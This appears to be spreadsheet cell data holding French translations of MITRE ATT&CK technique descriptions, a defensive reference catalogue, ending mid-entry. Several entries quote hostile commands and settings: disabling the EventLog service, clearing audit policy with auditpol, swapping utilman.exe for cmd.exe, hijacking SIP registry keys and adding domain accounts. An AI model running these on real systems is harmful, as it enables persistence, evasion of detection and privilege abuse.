Windows Transactional NTFS (TxF) a été introduit dans Vista en tant que méthode pour effectuer des opérations de fichiers sécurisées. (Citation : Microsoft TxF) Pour garantir l’intégrité des données, TxF n’autorise qu’un seul handle transactionnel à écrire dans un fichier à un moment donné. Jusqu’à ce que la transaction de descripteur d’écriture soit terminée, tous les autres descripteurs sont isolés de l’enregistreur et ne peuvent lire que la version validée du fichier qui existait au moment de l’ouverture du descripteur. (Citation : Concepts de base de Microsoft TxF) Pour éviter la corruption, TxF effectue une restauration automatique si le système ou l’application échoue lors d’une transaction d’écriture. (Citation : Microsoft Où utiliser TxF)
Bien qu’elle soit obsolète, l’interface de programmation d’application (API) TxF est toujours activée à partir de Windows 10. (Citation : BlackHat Process Doppelgänging décembre 2017)
Les adversaires peuvent abuser de TxF pour effectuer une variante sans fichier de [Injection de processus](https://attack.mitre.org/techniques/T1055). À l’instar du [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), le doppelgänging de processus consiste à remplacer la mémoire d’un processus légitime, permettant l’exécution voilée d’un code malveillant susceptible d’échapper aux défenses et à la détection. L’utilisation de TxF par Process Doppelgänging évite également l’utilisation de fonctions API hautement surveillées telles que &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt; et &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation : BlackHat Process Doppelgänging décembre 2017)
Le processus Doppelgänging est mis en œuvre en 4 étapes (Citation : BlackHat Process Doppelgänging Dec 2017) :
* Transaction – Créez une transaction TxF à l’aide d’un exécutable légitime, puis écrasez le fichier avec un code malveillant. Ces modifications seront isolées et ne seront visibles que dans le contexte de la transaction.
* Charger – Créez une section partagée de la mémoire et chargez l’exécutable malveillant.
* Rollback – Annulez les modifications apportées à l’exécutable d’origine, supprimant ainsi le code malveillant du système de fichiers.
* Animer – Créez un processus à partir de la section corrompue de la mémoire et lancez l’exécution.
Ce comportement n’entraînera probablement pas de privilèges élevés, car le processus injecté a été généré à partir du processus d’injection (et hérite donc du contexte de sécurité). Cependant, l’exécution via le doppelgänging de processus peut échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des détails sur la configuration et les paramètres du réseau, tels que les adresses IP et/ou MAC, des systèmes auxquels ils accèdent ou par le biais de la découverte d’informations sur des systèmes distants. Il existe plusieurs utilitaires d’administration du système d’exploitation qui peuvent être utilisés pour collecter ces informations. Exemples : [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102) et [route](https://attack.mitre.org/software/S0103).
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations sur les configurations et les paramètres, tels que les adresses IP des interfaces configurées et les routes statiques/dynamiques (par exemple, &lt;code&gt;show ip route&lt;/code&gt;, &lt;code&gt;show ip interface&lt;/code&gt;). (Référence : US-CERT-TA18-106A)(Citation : Intrusion mondiale de Mandiant APT41)
Les adversaires peuvent utiliser les informations de [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) lors de la découverte automatisée pour façonner les comportements de suivi, y compris la détermination de certains accès au sein du réseau cible et les actions à effectuer ensuite.
https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>Un adversaire peut supprimer une instance cloud après qu’elle a effectué des activités malveillantes dans le but d’échapper à la détection et de supprimer les preuves de sa présence.  La suppression d’une instance ou d’une machine virtuelle peut supprimer des artefacts d’investigation précieux et d’autres preuves de comportement suspect si l’instance n’est pas récupérable.
Un adversaire peut également [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et résilier ultérieurement l’instance après avoir atteint ses objectifs. (Citation : Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans des référentiels de code publics des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les victimes peuvent stocker du code dans des référentiels sur divers sites Web tiers tels que GitHub, GitLab, SourceForge et BitBucket. Les utilisateurs interagissent généralement avec les référentiels de code par le biais d’une application Web ou d’utilitaires de ligne de commande tels que git.  
Les adversaires peuvent rechercher diverses informations sur une victime dans divers référentiels de code publics. Les dépôts de code publics peuvent souvent être une source d’informations générales sur les victimes, telles que les langages de programmation et les bibliothèques couramment utilisés, ainsi que les noms des employés. Les adversaires peuvent également identifier des données plus sensibles, notamment des informations d’identification ou des clés API divulguées accidentellement. (Citation : Informations d’identification du service cloud GitHub) Les informations provenant de ces sources peuvent révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing for Information](https://attack.mitre.org/techniques/T1598)), d’établissement de ressources opérationnelles (ex : [Comptes compromis](https://attack.mitre.org/techniques/T1586) ou [Infrastructure de compromis](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Comptes valides](https://attack.mitre.org/techniques/T1078) ou [Phishing]( https://attack.mitre.org/techniques/T1566)). 
**Remarque :** Ceci est distinct des [Dépôts de code](https://attack.mitre.org/techniques/T1213/003), qui se concentrent sur [Collection](https://attack.mitre.org/tactics/TA0009) à partir des dépôts de code privés et hébergés en interne.
https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les fichiers binaires utilisés par un installateur. Ces processus peuvent exécuter automatiquement des fichiers binaires spécifiques dans le cadre de leurs fonctionnalités ou pour effectuer d’autres actions. Si les autorisations sur le répertoire du système de fichiers contenant un binaire cible, ou les autorisations sur le binaire lui-même, ne sont pas correctement définies, le binaire cible peut être remplacé par un autre binaire à l’aide des autorisations de niveau utilisateur et exécuté par le processus d’origine. Si le processus et le thread d’origine s’exécutent sous un niveau d’autorisation supérieur, le fichier binaire remplacé s’exécutera également sous des autorisations de niveau supérieur, qui peuvent inclure SYSTEM.
Une autre variante de cette technique peut être réalisée en tirant parti d’une faiblesse courante chez les installateurs exécutables et auto-extractibles. Au cours du processus d’installation, il est courant que les installateurs utilisent un sous-répertoire dans le répertoire &lt;code&gt;%TEMP %&lt;/code&gt; pour décompresser les fichiers binaires tels que les DLL, les EXE ou d’autres charges utiles. Lorsque les programmes d’installation créent des sous-répertoires et des fichiers, ils ne définissent souvent pas les autorisations appropriées pour restreindre l’accès en écriture, ce qui permet l’exécution de code non approuvé placé dans les sous-répertoires ou l’écrasement des fichiers binaires utilisés dans le processus d’installation. Ce comportement est lié à [Détournement d’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001) et peut en tirer parti.
Les adversaires peuvent utiliser cette technique pour remplacer des fichiers binaires légitimes par des fichiers malveillants afin d’exécuter du code à un niveau d’autorisation plus élevé. Certains programmes d’installation peuvent également exiger des privilèges élevés qui entraîneront une élévation des privilèges lors de l’exécution de code contrôlé par l’adversaire. Ce comportement est lié à [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002). Plusieurs exemples de cette faiblesse dans les installateurs courants existants ont été signalés aux fournisseurs de logiciels. (Référence : mozilla_sec_adv_2012)  (Citation : Les installateurs exécutables sont vulnérables) Si le processus d’exécution est configuré pour s’exécuter à un moment précis ou lors d’un certain événement (par exemple, le démarrage du système), cette technique peut également être utilisée pour la persistance.
https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des fonctionnalités d’accessibilité. Windows contient des fonctionnalités d’accessibilité qui peuvent être lancées à l’aide d’une combinaison de touches avant qu’un utilisateur ne se soit connecté (par exemple, lorsque l’utilisateur se trouve sur l’écran d’ouverture de session Windows). Un adversaire peut modifier la façon dont ces programmes sont lancés pour obtenir une invite de commande ou une porte dérobée sans se connecter au système.
Deux programmes d’accessibilité courants sont &lt;code&gt;C :\Windows\System32\sethc.exe&lt;/code&gt;, lancé lorsque la touche Maj est enfoncée cinq fois et &lt;code&gt;C :\Windows\System32\utilman.exe&lt;/code&gt;, lancé lorsque la combinaison de touches Windows + U est enfoncée. Le programme sethc.exe est souvent appelé « sticky keys » et a été utilisé par des adversaires pour un accès non authentifié via un écran de connexion de bureau à distance. (Citation : FireEye Hikit Rootkit)
Selon la version de Windows, un adversaire peut tirer parti de ces fonctionnalités de différentes manières. Les méthodes couramment utilisées par les adversaires incluent le remplacement des fichiers binaires des fonctionnalités d’accessibilité ou des pointeurs/références à ces fichiers binaires dans le registre. Dans les versions plus récentes de Windows, le fichier binaire remplacé doit être signé numériquement pour les systèmes x64, le fichier binaire doit résider dans &lt;code&gt;%systemdir %\&lt;/code&gt; et il doit être protégé par la protection des fichiers ou des ressources Windows (WFP/WRP). (Citation : DEFCON2016 Sticky Keys) La méthode de débogage [Injection d’options d’exécution de fichier image](https://attack.mitre.org/techniques/T1546/012) a probablement été découverte comme une solution de contournement potentielle, car elle ne nécessite pas le remplacement du binaire de la fonctionnalité d’accessibilité correspondante.
Pour un remplacement binaire simple sur Windows XP et versions ultérieures ainsi que sur Windows Server 2003/R2 et versions ultérieures, par exemple, le programme (par exemple, &lt;code&gt;C :\Windows\System32\utilman.exe&lt;/code&gt;) peut être remplacé par « cmd.exe » (ou un autre programme qui fournit un accès par porte dérobée). Par la suite, si vous appuyez sur la combinaison de touches appropriée sur l’écran de connexion alors que vous êtes assis devant le clavier ou lorsque vous êtes connecté via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001), le fichier remplacé sera exécuté avec les privilèges SYSTEM. (Référence : Tilbury 2014)
D’autres caractéristiques d’accessibilité existent qui peuvent également être exploitées de la même manière : (Citation : DEFCON2016 Sticky Keys) (Référence : Abus d’accessibilité du Narrateur)
* Clavier à l’écran : &lt;code&gt;C :\Windows\System32\osk.exe&lt;/code&gt;
* Loupe : &lt;code&gt;C :\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrateur : &lt;code&gt;C :\Windows\System32\Narrator.exe&lt;/code&gt;
* Commutateur d’affichage : &lt;code&gt;C :\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* Sélecteur d’applications : &lt;code&gt;C :\Windows\System32\AtBroker.exe&lt;/code&gt;
https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver la journalisation des événements Windows afin de limiter les données qui peuvent être exploitées pour les détections et les audits. Les journaux d'événements Windows enregistrent les activités des utilisateurs et du système, telles que les tentatives d'ouverture de session, la création de processus et bien d'autres choses encore (Citation : Windows Log Events) Ces données sont utilisées par les outils de sécurité et les analystes pour générer des détections.
Le service EventLog conserve les journaux d'événements provenant de divers composants et applications du système (Citation : EventLog_Core_Technologies). Par défaut, le service démarre automatiquement lorsqu'un système est mis sous tension. Une politique d'audit, gérée par la stratégie de sécurité locale (secpol.msc), définit les événements du système que le service EventLog enregistre. Les paramètres de la politique d'audit de sécurité peuvent être modifiés en exécutant secpol.msc, puis en accédant à &lt;code&gt;Paramètres de sécurité - Politiques locales - Politique d'audit&lt;/code&gt; pour les paramètres de base de la politique d'audit ou à &lt;code&gt;Paramètres de sécurité - Configuration avancée de la politique d'audit&lt;/code&gt; pour les paramètres avancés de la politique d'audit.(Citation : Audit_Policy_Microsoft)(Citation : Advanced_sec_audit_policy_settings) &lt;code&gt;auditpol.exe&lt;/code&gt; peut également être utilisé pour définir les politiques d'audit.(Citation : auditpol)
Les adversaires peuvent cibler la journalisation de l'ensemble du système ou seulement celle d'une application particulière. Par exemple, le service Windows EventLog peut être désactivé à l'aide des commandes &lt;code&gt;Set-Service -Name EventLog -Status Stopped&lt;/code&gt; ou &lt;code&gt;sc config eventlog start=disabled&lt;/code&gt; (suivies de l'arrêt manuel du service à l'aide de &lt;code&gt;Stop-Service -Name EventLog&lt;/code&gt;). (Citation : Disable_Win_Event_Logging)(Citation : disable_win_evt_logging) En outre, le service peut être désactivé en modifiant la valeur « Start » dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog&lt;/code&gt; puis en redémarrant le système pour que la modification prenne effet.(Citation : disable_win_evt_logging)
Il existe plusieurs façons de désactiver le service EventLog en modifiant la clé de registre. Premièrement, sans les privilèges de l'administrateur, les adversaires peuvent modifier la valeur "Start" dans la clé &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security&lt;/code&gt;, puis redémarrer le système pour désactiver le journal des événements de sécurité. (Citation : winser19_file_overwrite_bug_twitter) Deuxièmement, avec les privilèges de l'administrateur, les adversaires peuvent modifier les mêmes valeurs dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System&lt;/code&gt; et &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application&lt;/code&gt; pour désactiver l'ensemble de l'EventLog. (Citation : disable_win_evt_logging)
En outre, les adversaires peuvent utiliser &lt;code&gt;auditpol&lt;/code&gt; et ses sous-commandes dans une invite de commande pour désactiver l'audit ou effacer la politique d'audit. Pour activer ou désactiver un paramètre ou une catégorie d'audit spécifique, les adversaires peuvent utiliser les paramètres &lt;code&gt;/success&lt;/code&gt; ou &lt;code&gt;/failure&lt;/code&gt;. Par exemple, &lt;code&gt;auditpol /set /category : « Account Logon » /success:disable /failure:disable&lt;/code&gt; désactive l'audit pour la catégorie Account Logon.(Citation : auditpol.exe_STRONTIC)(Citation : T1562.002_redcanaryco) Pour effacer la politique d'audit, les adversaires peuvent exécuter les lignes suivantes : &lt;code&gt;auditpol /clear /y&lt;/code&gt; ou &lt;code&gt;auditpol /remove /allusers&lt;/code&gt;.(Citation : T1562.002_redcanaryco)
En désactivant la journalisation des événements Windows, les adversaires peuvent opérer en laissant moins de preuves d'une compromission.
https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent altérer les composants du SIP et du fournisseur de confiance pour tromper le système d'exploitation et les outils de contrôle des applications lorsqu'ils effectuent des contrôles de validation des signatures. En mode utilisateur, les signatures numériques Windows Authenticode (Citation : Microsoft Authenticode) sont utilisées pour vérifier l'origine et l'intégrité d'un fichier, variables qui peuvent être utilisées pour établir la confiance dans un code signé (ex : un pilote avec une signature Microsoft valide peut être considéré comme sûr). Le processus de validation de la signature est géré par la fonction WinVerifyTrust de l'interface de programmation d'application (API) (Citation : Microsoft WinVerifyTrust) qui accepte une demande et se coordonne avec le fournisseur de confiance approprié, qui est responsable de la validation des paramètres d'une signature. (Citation : SpectorOps Subverting Trust Sept 2017)
En raison de la diversité des types de fichiers exécutables et des formats de signature correspondants, Microsoft a créé des composants logiciels appelés « Subject Interface Packages » (SIP) (Citation : EduardosBlog SIPs July 2008) pour fournir une couche d'abstraction entre les fonctions de l'API et les fichiers. Les SIP permettent aux fonctions API de créer, d'extraire, de calculer et de vérifier les signatures. Des SIP uniques existent pour la plupart des formats de fichiers (Executable, PowerShell, Installer, etc., la signature de catalogue fournissant un fourre-tout (Citation : Microsoft Catalog Files and Signatures April 2017)) et sont identifiés par des identifiants uniques globaux (GUID). (Citation : SpectorOps Subverting Trust Sept 2017)
Comme dans le cas de [Code Signing] (https://attack.mitre.org/techniques/T1553/002), les adversaires peuvent abuser de cette architecture pour subvertir les contrôles de confiance et contourner les politiques de sécurité qui n'autorisent que les codes légitimement signés à s'exécuter sur un système. Les adversaires peuvent détourner les composants du SIP et du fournisseur de confiance pour tromper le système d'exploitation et les outils de contrôle des applications et classer un code malveillant (ou n'importe quel code) comme étant signé par un fournisseur de confiance : (Citation : SpectorOps Subverting Trust Sept 2017)
* Modifier les valeurs de registre &lt;code&gt;Dll&lt;/code&gt; et &lt;code&gt;FuncName&lt;/code&gt; dans &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; qui pointent vers la bibliothèque de liens dynamiques (DLL) fournissant la fonction CryptSIPDllGetSignedDataMsg d'un SIP, qui récupère un certificat numérique codé à partir d'un fichier signé. En pointant vers une DLL malicieusement fabriquée avec une fonction exportée qui renvoie toujours une bonne valeur de signature connue (ex : une signature Microsoft pour les exécutables portables) plutôt que la signature réelle du fichier, un adversaire peut appliquer une valeur de signature acceptable à tous les fichiers utilisant ce SIP (Citation : GitHub SIP POC Sept 2017) (bien qu'une discordance de hachage se produira probablement, invalidant la signature, puisque le hachage renvoyé par la fonction ne correspondra pas à la valeur calculée à partir du fichier).
Modifier les valeurs des registres Dll et FuncName ii &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; qui pointent vers la DLL fournissant la fonction CryptSIPDllVerifyIndirectData d'un SIP, qui valide le hachage calculé d'un fichier par rapport à la valeur de hachage signée. En pointant vers une DLL malicieusement fabriquée avec une fonction exportée qui renvoie toujours TRUE (indiquant que la validation a réussi), un adversaire peut valider avec succès n'importe quel fichier (avec une signature légitime) en utilisant ce SIP (Citation : GitHub SIP POC Sept 2017) (avec ou sans détournement de la fonction CryptSIPDllGetSignedDataMsg mentionnée précédemment). Cette valeur de registre pourrait également être redirigée vers une fonction exportée appropriée d'une DLL déjà présente, ce qui éviterait de devoir déposer et exécuter un nouveau fichier sur le disque.
* Modifier les valeurs du registre des DLL et des fonctions dans &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{guid du fournisseur de confiance}&lt;/code&gt; qui pointent vers la DLL fournissant la fonction FinalPolicy d'un fournisseur de confiance, qui est l'endroit où la signature décodée et analysée est vérifiée et où la majorité des décisions de confiance sont prises. Comme pour le détournement de la fonction CryptSIPDllVerifyIndirectData de SIP, cette valeur peut être redirigée vers une fonction exportée appropriée d'une DLL déjà présente ou d'une DLL malicieusement fabriquée (bien que la mise en œuvre d'un fournisseur de confiance soit complexe).
**Note:** Les détournements ci-dessus sont également possibles sans modifier le registre via [DLL Search Order Hijacking] (https://attack.mitre.org/techniques/T1574/001).
Le détournement de composants SIP ou de fournisseurs de confiance peut également permettre une exécution de code persistante, car ces composants malveillants peuvent être invoqués par toute application qui effectue une signature de code ou une validation de signature. (Citation : SpectorOps Subverting Trust Sept 2017)
https://attack.mitre.org/techniques/T1553/003"</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des configurations d'autorisation qui leur permettent d'obtenir un accès temporairement élevé aux ressources de l'informatique en nuage. De nombreux environnements en nuage permettent aux administrateurs d'accorder aux comptes d'utilisateurs ou de services la permission de demander un accès juste à temps à des rôles, d'usurper l'identité d'autres comptes, de transmettre des rôles à des ressources et à des services, ou d'obtenir un accès à court terme à un ensemble de privilèges qui peuvent être distincts des leurs.
L'accès juste à temps est un mécanisme qui permet d'accorder des rôles supplémentaires aux comptes cloud de manière granulaire et temporaire. Cela permet aux comptes de fonctionner avec les seules autorisations dont ils ont besoin au quotidien, et de demander des autorisations supplémentaires si nécessaire. Parfois, les demandes d'accès juste à temps sont configurées pour nécessiter une approbation manuelle, tandis que d'autres fois, les autorisations souhaitées sont automatiquement accordées.(Citation : Azure Just in Time Access 2023)
L'usurpation d'identité permet aux comptes d'utilisateurs ou de services d'agir temporairement avec les autorisations d'un autre compte. Par exemple, dans GCP, les utilisateurs ayant le rôle `iam.serviceAccountTokenCreator` peuvent créer des jetons d'accès temporaires ou signer des charges utiles arbitraires avec les autorisations d'un compte de service, tandis que les comptes de service ayant l'autorisation de délégation à l'échelle du domaine sont autorisés à se faire passer pour des comptes Google Workspace. (Citation : Google Cloud Service Account Authentication Roles)(Citation : Hunters Domain Wide Delegation Google Workspace 2023)(Citation : Google Cloud Just in Time Access 2023)(Citation : Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) Dans Exchange Online, le rôle `ApplicationImpersonation` permet à un compte de service d'utiliser les autorisations associées aux comptes d'utilisateurs spécifiés.(Citation : Microsoft Impersonation and EWS in Exchange)
De nombreux environnements en nuage comprennent également des mécanismes permettant aux utilisateurs de confier des rôles à des ressources qui leur permettent d'effectuer des tâches et de s'authentifier auprès d'autres services. Si l'utilisateur qui crée la ressource n'assume pas directement le rôle qu'il lui attribue, il peut néanmoins tirer parti de l'accès au rôle, par exemple en configurant la ressource pour qu'elle effectue certaines actions avec les autorisations qui lui ont été accordées. Dans AWS, les utilisateurs disposant de l'autorisation `PassRole` peuvent permettre à un service qu'ils créent d'assumer un rôle donné, tandis que dans GCP, les utilisateurs disposant du rôle `iam.serviceAccountUser` peuvent attacher un compte de service à une ressource.(Citation : AWS PassRole)(Citation : Rôles d'authentification du compte de service Google Cloud)
Si les utilisateurs doivent se voir attribuer des rôles spécifiques pour pouvoir utiliser l'une ou l'autre de ces fonctionnalités, les administrateurs du cloud peuvent mal configurer les autorisations. Cela peut entraîner des voies d'escalade qui permettent à des adversaires d'accéder à des ressources au-delà de ce qui était prévu à l'origine.(Citation : Rhino Google Cloud Privilege Escalation)(Citation : Rhino Security Labs AWS Privilege Escalation)
**Note:** cette technique est différente de [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), qui implique l'attribution de rôles permanents aux comptes plutôt que d'abuser des structures de permissions existantes pour obtenir un accès temporairement élevé aux ressources. Cependant, les adversaires qui compromettent un compte suffisamment privilégié peuvent accorder à un autre compte qu'ils contrôlent des [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) qui leur permettraient également d'abuser de ces fonctionnalités. Cela peut également permettre une plus grande discrétion que si l'on utilisait directement le compte hautement privilégié, en particulier lorsque les journaux ne précisent pas quand l'usurpation de rôle a lieu. (Citation : CrowdStrike StellarParticle January 2022)
https://attack.mitre.org/techniques/T1548/005"</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les ressources de bande passante réseau des systèmes cooptés pour effectuer des tâches gourmandes en ressources, ce qui peut avoir un impact sur la disponibilité du système et/ou des services hébergés. 
Les adversaires peuvent également utiliser des logiciels malveillants qui exploitent la bande passante réseau d’un système dans le cadre d’un botnet afin de faciliter les campagnes de [déni de service du réseau](https://attack.mitre.org/techniques/T1498) et/ou d’amorcer des torrents malveillants. (Citation : GoBotKR) Alternativement, ils peuvent se livrer au proxyjacking en vendant l’utilisation de la bande passante du réseau et de l’adresse IP des victimes à des services de proxyware. (Citation : Sysdig Proxyjacking) Enfin, ils peuvent effectuer une analyse à l’échelle d’Internet afin d’identifier d’autres cibles de compromission. (Citation : Unité 42 Variables d’environnement divulguées 2024)
En plus d’entraîner des coûts financiers potentiels ou des interruptions de disponibilité, cette technique peut nuire à la réputation si la bande passante d’une victime est utilisée pour des activités illégales. (Citation : Sysdig Proxyjacking)
https://attack.mitre.org/techniques/T1496/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes, de noms d’utilisateur ou d’adresses e-mail valides sur un système ou dans un environnement compromis. Ces informations peuvent aider les adversaires à déterminer quels comptes existent, ce qui peut faciliter les comportements ultérieurs tels que le brute-forcing, les attaques de spear-phishing ou les prises de contrôle de comptes (par exemple, [Comptes valides](https://attack.mitre.org/techniques/T1078)).
Les adversaires peuvent utiliser plusieurs méthodes pour énumérer les comptes, notamment l’utilisation abusive des outils existants, des commandes intégrées et des erreurs de configuration potentielles qui divulguent des noms de comptes, des rôles ou des autorisations dans l’environnement ciblé.
Par exemple, les environnements cloud fournissent généralement des interfaces facilement accessibles pour obtenir des listes d’utilisateurs. (Citation : Utilisateurs de la liste AWS)(citation : Google Cloud - API de liste de comptes IAM Servie) Sur les hôtes, les adversaires peuvent utiliser [PowerShell](https://attack.mitre.org/techniques/T1059/001) par défaut et d’autres fonctionnalités de ligne de commande pour identifier les comptes. Les informations sur les adresses e-mail et les comptes peuvent également être extraites en recherchant les fichiers d’un système infecté.
https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un proxy de connexion pour diriger le trafic réseau entre les systèmes ou agir en tant qu’intermédiaire pour les communications réseau vers un serveur de commande et de contrôle afin d’éviter les connexions directes à leur infrastructure. Il existe de nombreux outils qui permettent la redirection du trafic via des proxys ou la redirection de port, notamment [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy et ZXPortMap. (Citation : Outils d’attaque APT de Trend Micro) Les adversaires utilisent ces types de proxys pour gérer les communications de commande et de contrôle, réduire le nombre de connexions réseau sortantes simultanées, assurer la résilience face à la perte de connexion ou contourner les voies de communication fiables existantes entre les victimes afin d’éviter les soupçons. Les adversaires peuvent enchaîner plusieurs proxys pour dissimuler davantage la source du trafic malveillant.
Les adversaires peuvent également tirer parti des schémas de routage dans les réseaux de diffusion de contenu (CDN) pour proxy de commande et contrôler le trafic.
https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des interpréteurs de commandes et de scripts pour exécuter des commandes, des scripts ou des fichiers binaires. Ces interfaces et langages permettent d’interagir avec les systèmes informatiques et sont communs à de nombreuses plates-formes différentes. La plupart des systèmes sont livrés avec une interface de ligne de commande intégrée et des capacités de script, par exemple, les distributions macOS et Linux incluent une version de [Unix Shell](https://attack.mitre.org/techniques/T1059/004) tandis que les installations Windows incluent le [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) et [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Il existe également des interpréteurs multiplateformes tels que [Python](https://attack.mitre.org/techniques/T1059/006), ainsi que ceux couramment associés à des applications clientes telles que [JavaScript](https://attack.mitre.org/techniques/T1059/007) et [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Les adversaires peuvent abuser de ces technologies de diverses manières afin d’exécuter des commandes arbitraires. Les commandes et les scripts peuvent être intégrés dans les charges utiles [Accès initial](https://attack.mitre.org/tactics/TA0001) fournies aux victimes sous forme de documents de leurre ou de charges utiles secondaires téléchargées à partir d’un C2 existant. Les adversaires peuvent également exécuter des commandes via des terminaux/shells interactifs, ainsi qu’utiliser divers [Services à distance](https://attack.mitre.org/techniques/T1021) afin d’effectuer une exécution à distance. (Citation : Commandes à distance Powershell)(Citation : Cisco IOS Software Integrity Assurance - Historique des commandes)(citation : Exécution de shell à distance en Python)
https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de bloquer la collecte et l’analyse d’indicateurs ou d’événements généralement capturés par les capteurs. Il peut s’agir d’une redirection malveillante (Citation : Microsoft Lamin Septembre 2017) ou même de la désactivation de capteurs basés sur l’hôte, tels que le suivi d’événements pour Windows (ETW) (Référence : Microsoft À propos du suivi d’événements 2018), en modifiant les paramètres qui contrôlent la collecte et le flux de la télémétrie d’événements. (Citation : Medium Event Tracing Tampering 2018) Ces paramètres peuvent être stockés sur le système dans des fichiers de configuration et/ou dans le registre, et être accessibles via des utilitaires d’administration tels que [PowerShell](https://attack.mitre.org/techniques/T1059/001) ou [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
Par exemple, les adversaires peuvent modifier la valeur 'File' dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security&lt;/code&gt; pour masquer leurs actions malveillantes dans un fichier journal .evtx nouveau ou différent. Cette action ne nécessite pas de redémarrage du système et prend effet immédiatement. (Référence : disable_win_evt_logging) 
L’interruption ETW peut être réalisée de plusieurs façons, mais la plus directement en définissant des conditions à l’aide de l’applet de commande [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; ou en s’interfaçant directement avec le Registre pour apporter des modifications.
Dans le cas de la génération de rapports d’indicateurs basée sur le réseau, un adversaire peut bloquer le trafic associé aux rapports pour empêcher l’analyse centrale. Cela peut se faire par de nombreux moyens, tels que l’arrêt d’un processus local responsable du transfert des données de télémétrie et/ou la création d’une règle de pare-feu basée sur l’hôte pour bloquer le trafic vers des hôtes spécifiques responsables de l’agrégation des événements, tels que les produits de gestion des informations et des événements de sécurité (SIEM).
Dans les environnements Linux, les adversaires peuvent désactiver ou reconfigurer les outils de traitement des journaux tels que syslog ou nxlog pour inhiber les capacités de détection et de surveillance afin de faciliter les comportements de suivi (Citation : LemonDuck).
https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un compte de domaine pour maintenir l’accès aux systèmes des victimes. Les comptes de domaine sont ceux gérés par les services de domaine Active Directory où l’accès et les autorisations sont configurés sur les systèmes et services qui font partie de ce domaine. Les comptes de domaine peuvent couvrir les comptes d’utilisateur, d’administrateur et de service. Avec un niveau d’accès suffisant, la commande &lt;code&gt;net user /add /domain&lt;/code&gt; peut être utilisée pour créer un compte de domaine. (Référence : Savill 1999)
Ces comptes peuvent être utilisés pour établir un accès secondaire authentifié qui ne nécessite pas le déploiement d’outils d’accès à distance persistants sur le système.
https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir les noms des employés qui peuvent être utilisés lors du ciblage. Les noms des employés doivent être utilisés pour dériver des adresses e-mail ainsi que pour aider à guider d’autres efforts de reconnaissance et/ou à créer des leurres plus crédibles.
